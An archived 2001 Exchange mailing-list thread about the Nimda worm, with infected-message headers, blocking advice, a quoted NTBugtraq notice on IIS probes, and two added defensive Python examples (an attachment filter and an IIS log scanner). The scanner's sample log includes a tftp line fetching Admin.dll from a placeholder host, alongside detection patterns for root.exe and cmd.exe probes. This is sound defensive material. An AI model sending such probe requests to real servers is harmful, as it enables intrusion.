RE: New Virus / Worm ??

2001-09-21 Thread Hunter, Lori

Sigh.  Carine, I've sent you the link to Trend's try and buy version of
scanmail at least twice.  Even if you can't remember me, I remember you.
Please go get the software right now so you can quit having these problems.
Next week, buy it.

http://www.antivirus.com/download/

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 4:51 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


You can't. You need a product like TrendMicro's eManager. There are some 
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

Thank you

Carine



Improve your customers' satisfaction at a lower cost.
Click here for details :-
http://www.scs.com.my/scsNews.asp?article=30




_
List posting FAQ:   http://www.swinc.com/resource/exch_faq.htm
Archives:   http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]





RE: New Virus / Worm ??

2001-09-21 Thread Martin Blackstone

That is EXACTLY what I did when ILOVEYOU struck.
We had Network Associates and it was coming through. DL'd and installed
Scanmail on the spot. NEVER looked back

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]] On Behalf Of Hunter, Lori
Sent: Friday, September 21, 2001 2:41 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Sigh.  Carine, I've sent you the link to Trend's try and buy version of
scanmail at least twice.  Even if you can't remember me, I remember you.
Please go get the software right now so you can quit having these
problems. Next week, buy it.

http://www.antivirus.com/download/

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 4:51 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


You can't. You need a product like TrendMicro's eManager. There are some
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

 where to configure at the Exchange servers??? I could not find
any options to block it... huh!!! ;-(

Thank you

Carine





RE: New Virus / Worm ??

2001-09-20 Thread Richard_Ku

Dear Everyone!

This is the real thing and seems to be spreading fast,  please configure
your antivirus product running on the SMTP and the Exchange servers to block
all attachments coming through with the extension .EXE or block the files
coming through with the name README.EXE.  

Using eManager for InterScan you can block using Anti-Spam filter, to block
all README.EXE or *.EXE. 


Richard Ku

-Original Message-
From: William Smith [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


It's a new/variant worm, possibly related to this:

http://www.zdnet.com/eweek/stories/general/0,11011,2810273,00.html

W

-Original Message-
From: Andrew Chan [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:41 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


It's time to activate those Content Filter features, AGAIN... 

:-)

Andrew,
MCSE (NT  W2K) + CCNA
 

-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 8:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and
the subject line was a lot of nonsense characters. Using Outlook 2000 I
highlighted it and it kicked off the attachment, which opened Media
Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that
there are none so blind as those who will not see --The Moody Blues
(I know you're out there)
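
An added example, not part of any message in this thread: a Python sketch of the attachment check Richard Ku describes, run over a constructed message modelled on the header quoted above. The blocked-extension list, the addresses and the placeholder body are assumptions; it also flags an executable name declared under an audio, video or image type, the mismatch visible in that header.

```python
import email
import os
from email import policy
from email.utils import collapse_rfc2231_value

# Extensions the filter refuses outright (assumed list for illustration).
BLOCKED_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat", ".vbs"}
# Media types a mail client may try to play or render inline.
INLINE_MEDIA = {"audio", "video", "image"}

# Constructed sample: same MIME layout as the quoted header, placeholder body.
SAMPLE_MESSAGE = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/related;
 type="multipart/alternative";
 boundary="_ABC1234567890DEF_"

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
 boundary="_ABC0987654321DEF_"

--_ABC0987654321DEF_
Content-Type: text/html;
 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html><body></body></html>
--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
 name="readme.exe"
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVI=
--_ABC1234567890DEF_--
"""


def declared_names(part):
    """Collect every file name a part declares, from both headers.

    A filter that reads only Content-Disposition misses a name carried
    solely in the Content-Type 'name' parameter, as in the sample.
    """
    names = set()
    for header, param in (("content-disposition", "filename"),
                          ("content-type", "name")):
        value = part.get_param(param, header=header)
        if value is not None:
            names.add(collapse_rfc2231_value(value).strip().lower())
    return names


def inspect_message(raw):
    """Return one finding per blocked attachment name in the message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        for name in sorted(declared_names(part)):
            # Windows ignores trailing dots and spaces, so "readme.exe."
            # still opens as an executable.
            ext = os.path.splitext(name.rstrip(". "))[1]
            if ext not in BLOCKED_EXTENSIONS:
                continue
            reasons = ["blocked-extension"]
            if part.get_content_maintype() in INLINE_MEDIA:
                reasons.append("type-extension-mismatch")
            findings.append({"name": name,
                             "content_type": part.get_content_type(),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in inspect_message(SAMPLE_MESSAGE):
        print(finding)
```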





RE: New Virus / Worm ??

2001-09-20 Thread Carine Lim, Sr.SystEng, SCSM/NSB

 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 1:58 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??
Importance: High


Dear Everyone!

This is the real thing and seems to be spreading fast,  please configure
your antivirus product running on the SMTP and the Exchange servers to block
all attachments coming through with the extension .EXE or block the files
coming through with the name README.EXE.  

Using eManager for InterScan you can block using Anti-Spam filter, to block
all README.EXE or *.EXE. 


Richard Ku

-Original Message-
From: William Smith [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


It's a new/variant worm, possibly related to this:

http://www.zdnet.com/eweek/stories/general/0,11011,2810273,00.html

W

-Original Message-
From: Andrew Chan [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:41 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


It's time to activate those Content Filter features, AGAIN... 

:-)

Andrew,
MCSE (NT  W2K) + CCNA
 

-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 8:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and
the subject line was a lot of nonsense characters. Using Outlook 2000 I
highlighted it and it kicked off the attachment, which opened Media
Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that
there are none so blind as those who will not see --The Moody Blues
(I know you're out there)





RE: New Virus / Worm ??

2001-09-20 Thread Carine Lim, Sr.SystEng, SCSM/NSB


 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

Thank you

Carine






RE: New Virus / Worm ??

2001-09-20 Thread rmeng2

You can't. You need a product like TrendMicro's eManager. There are some 
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

Thank you

Carine






RE: New Virus / Worm ??

2001-09-20 Thread Busby, Jacob

Affected emails have an attached file called README.EXE. The virus attempts
to exploit a MIME Vulnerability in some versions of Microsoft Outlook,
Microsoft Outlook Express, and Internet Explorer to allow the executable
file to run automatically without the user double-clicking on the
attachment.

Some versions of Microsoft Outlook, Outlook Express and Internet Explorer.
Isn't that a little vague? Anybody got any more precise information about
which versions of Outlook, OE and IE are affected? Is this virus
self-running (like Bubbleboy running out of the preview pane) or do you need
to run readme.exe to actually activate it?




RE: New Virus / Worm ??

2001-09-20 Thread Benjamin Winzenz

Really??  We're blocking .exe's just fine using Scanmail (scratching head).
Does that mean we are special?

Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.

 -Original Message-
From:   [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent:   Thursday, September 20, 2001 5:51 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

You can't. You need a product like TrendMicro's eManager. There are some 
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

Thank you

Carine






RE: New Virus / Worm ??

2001-09-20 Thread Osborn, Joel

You're special enough to know that you can't do it with just Exchange out of
the box. 
8-{)

Joel K. Osborn
Information Systems Technical Specialist
Wisconsin Department of Transportation
[EMAIL PROTECTED]

-Original Message-
From: Benjamin Winzenz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 7:20 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Really??  We're blocking .exe's just fine using Scanmail (scratching head).
Does that mean we are special?

Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.

 -Original Message-
From:   [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent:   Thursday, September 20, 2001 5:51 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

You can't. You need a product like TrendMicro's eManager. There are some 
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

Thank you

Carine






RE: New Virus / Worm ??

2001-09-20 Thread Benjamin Winzenz

LOL!  Yeah, but I was also replying to the post that suggested you need
eManager to block attachments.  Most Exchange AV packages will do it just
fine.  Additional software like eManager I don't think is necessary.  Last
time I checked, eManager was for content blocking as well.

Carine was also kind of vague as to whether she thought it was a function of
Exchange, or just didn't know where to configure it in her AV software.
Hopefully by now she realizes that she at least needs some AV software in
order to have attachment blocking.  

Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.

 -Original Message-
From:   Osborn, Joel [mailto:[EMAIL PROTECTED]] 
Sent:   Thursday, September 20, 2001 9:21 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

You're special enough to know that you can't do it with just Exchange out of
the box. 
8-{)

Joel K. Osborn
Information Systems Technical Specialist
Wisconsin Department of Transportation
[EMAIL PROTECTED]

-Original Message-
From: Benjamin Winzenz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 7:20 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Really??  We're blocking .exe's just fine using Scanmail (scratching head).
Does that mean we are special?

Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.

 -Original Message-
From:   [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent:   Thursday, September 20, 2001 5:51 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

You can't. You need a product like TrendMicro's eManager. There are some 
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

Thank you

Carine






RE: New Virus / Worm ??

2001-09-20 Thread Rocky Stefano


I think they were talking about adding disclaimers and such



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]On Behalf Of Benjamin
Winzenz
Sent: September 20, 2001 8:20 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??



Really??  We're blocking .exe's just fine using Scanmail (scratching head).
Does that mean we are special?

Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.

 -Original Message-
From:   [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent:   Thursday, September 20, 2001 5:51 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

You can't. You need a product like TrendMicro's eManager. There are some
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

 where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(

Thank you

Carine






RE: New Virus / Worm ??

2001-09-20 Thread Anthony L. Sollars

Just got off a Seminar with Cisco and they revealed this Web page that
explains how to stop Nimda and Code Red at the router. Here is the Link.

http://www.cisco.com/warp/public/63/nimda.shtml

-Tony

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 1:32 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


You are right about ScanMail doing the attachment blocking. I have scanmail 
and emanager running. ScanMail is doing my attachment blocking 
and emanager is doing my content blocking.

At 05:19 AM 9/20/01 -0700, you wrote:
Really??  We're blocking .exe's just fine using Scanmail (scratching head).
Does that mean we are special?

Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.

  -Original Message-
From:   [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent:   Thursday, September 20, 2001 5:51 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

You can't. You need a product like TrendMicro's eManager. There are some
others too.

At 04:11 PM 9/20/01 +0800, you wrote:

  where to configure at the Exchange servers??? I could not find any
 options to block it... huh!!! ;-(
 
 Thank you
 
 Carine
 
 
 



RE: New Virus / Worm ??

2001-09-19 Thread sue

The important thing is that there is a patch for IE 5 and 5.5. IE 6.0
shouldn't need a patch since this issue was identified quite a while back.

The Media Player launch is annoying but relatively harmless, since Media
Player apparently can't launch an .exe file. Are you getting the prompt to
save the file? If not, check your IE security and see what the iFrame
setting is.

What I find interesting is that I'm running IE 6.0 on Win2K Pro and I
can't figure out what IE setting is causing it to trigger the Media
Player launch. I've turned sounds back on and still don't get Media
Player.


 The bulletin only relates to IE 5 and 5.5 and has been superseded. Following
 the trail of bulletins out to the end, they still say they only apply to IE
 5 and 5.5. I'm running IE 6.0 and still had Media Player launch because of
 the Mime code.
 
 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 4:57 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 It exploits the very dangerous iFrame vulnerability detailed at
 http://www.microsoft.com/technet/security/bulletin/ms01-020.asp. The one
 thing that article doesn't tell you is that the IE patch it describes does
 not block the ability of Office documents in an iFrame to launch
 automatically. What that means is that if you don't have Office macro
 security set high enough, the next attack could use a Word .doc macro to
 deliver its payload.
 
  I just received an e-mail with this virus/worm.  It appears to be not very
  nice.  I use the preview pane in Outlook and it automatically attempted to
  launch the attachment.  For once, I'm glad I had the new security features
  in Outlook SR-1 that does not allow launching an .exe w/out saving it to
 the
  hard drive first.




RE: New Virus / Worm ??

2001-09-18 Thread Pardee, Michael

Sounds like what I just now got notice of from Bugtraq


-BEGIN PGP SIGNED MESSAGE-

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These infected
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
audio/x-wav together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;

edit %systemroot%/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor



-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters.
Using Outlook 2000 I highlighted it and it kicked off the attachment, which
opened Media Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see
--The Moody Blues (I know you're out there)
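
An added example, not from NTBugtraq or any poster here: a Python scan of IIS W3C extended logs for the probes the notice above describes (ROOT.EXE under /scripts and /msadc, CMD.EXE through the /c and /d virtual roots, TFTP fetching ADMIN.DLL). The log lines are constructed, the addresses are documentation ranges, and the rule names are made up for this sketch.

```python
import re
from collections import defaultdict

# (rule name, pattern, log field it applies to). Names are hypothetical.
RULES = [
    ("root.exe-backdoor-probe",
     re.compile(r"^/(scripts|msadc)/root\.exe$", re.I), "cs-uri-stem"),
    ("cmd.exe-via-drive-vroot",
     re.compile(r"^/[cd]/.*cmd\.exe$", re.I), "cs-uri-stem"),
    ("tftp-admin.dll-fetch",
     re.compile(r"tftp.*admin\.dll", re.I), "cs-uri-query"),
]

# Constructed sample log, not taken from a real server.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:56:21 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 13:56:22 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:56:23 192.0.2.10 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:56:24 192.0.2.10 GET /d/winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:56:30 198.51.100.7 GET /scripts/root.exe /c+tftp+203.0.113.5+Admin.dll 200
2001-09-18 13:57:02 198.51.100.20 GET /default.htm - 200
"""


def parse_w3c(lines):
    """Yield one dict per request, using the #Fields directive for names."""
    fields = None
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            continue  # data before any #Fields line cannot be interpreted
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed record
        yield dict(zip(fields, values))


def scan(lines):
    """Map each client address to the rules it tripped.

    'succeeded' is set when any matching request got a 2xx status: the
    server answered the probe instead of rejecting it, so that server is
    the one to examine first.
    """
    report = defaultdict(lambda: {"indicators": set(), "succeeded": False})
    for rec in parse_w3c(lines):
        for name, pattern, field in RULES:
            if pattern.search(rec.get(field, "")):
                entry = report[rec.get("c-ip", "unknown")]
                entry["indicators"].add(name)
                if rec.get("sc-status", "").startswith("2"):
                    entry["succeeded"] = True
    return dict(report)


if __name__ == "__main__":
    for client, entry in sorted(scan(SAMPLE_LOG.splitlines()).items()):
        print(client, sorted(entry["indicators"]), entry["succeeded"])
```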



RE: New Virus / Worm ??

2001-09-18 Thread Boehm, Diane M.

I received the same thing.  I thought it may have been W32/APost@MM, because
my alert said GSE blocked readme.exe.  Nothing in the description for this
virus says anything about media player.  Any thoughts?

Diane

Diane Boehm
SC Johnson
[EMAIL PROTECTED]





-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters.
Using Outlook 2000 I highlighted it and it kicked off the attachment, which
opened Media Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see
--The Moody Blues (I know you're out there)





RE: New Virus / Worm ??

2001-09-18 Thread Chuck Parkey

Symantec has something now, not much:

http:[EMAIL PROTECTED]

-Original Message-
From: Atkinson, Daniel [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:41 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


yes, there is a new virus on the loose w32/nimda - we have just got it,
comes in the same way as w32/apost-mm using 'readme.exe'.

only sophos seem to know about it - symantec and mcafee have nothing.

our web servers are now under DoS attack, filling up with .eml files

arrggghh...

dan.




RE: New Virus / Worm ??

2001-09-18 Thread Etts, Russell

My OWA is getting SLAMMED!! OUCH!!

Thanks

Russell

-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters.
Using Outlook 2000 I highlighted it and it kicked off the attachment, which
opened Media Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see
--The Moody Blues (I know you're out there)





RE: New Virus / Worm ??

2001-09-18 Thread Atkinson, Daniel

at your own risk - reboot and remove the .eml files. seems to cure the
problem but doesn't prevent re-infection.

dan.
 




RE: New Virus / Worm ??

2001-09-18 Thread Atkinson, Daniel

the eml files appear all over the hard disk, although before i deleted them
all I did notice that they seemed to be in all the network shares - can't
confirm now they're gone!

dan.




RE: New Virus / Worm ??

2001-09-18 Thread Ewins, James

I also received one from you, or the address.  Open relay time?
JDE

 -Original Message-
From:   Ryan Malayter [mailto:[EMAIL PROTECTED]] 
Sent:   Tuesday, September 18, 2001 5:18 PM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

AFAIK, this infected message didn't come from me. It has my return address,
but as you can see, the sending server is mail.stadacona.ca. 

We block all executables at the server, and I started getting bounce
messages about an hour before I was even in the office.

Also, nobody I've ever actually emailed directly has bounced me a message,
and I'm not seeing any outbound port 25 traffic from any machine other than
my mail server. 

Can anyone confirm that this virus forges return addresses? The antiviral
vendors appear to be behind on this one...

-ryan-

-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters. Using Outlook 2000 I
highlighted it and it kicked off the attachment, which opened Media Player
and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see --The Moody Blues (I know
you're out there)





RE: New Virus / Worm ??

2001-09-18 Thread Romero, Eric

Please, name of the worm? Our Internet provider says that it is greencode and
suggested that we disconnect some of our servers... we have ALL MS patches on
those servers, how could that be?!

--er

-Original Message-
From: Ewins, James [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:26 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


You may wish to snip the stuff from the bottom of this thread before
replying folks, it seems to be upsetting people.
JDE

 -Original Message-
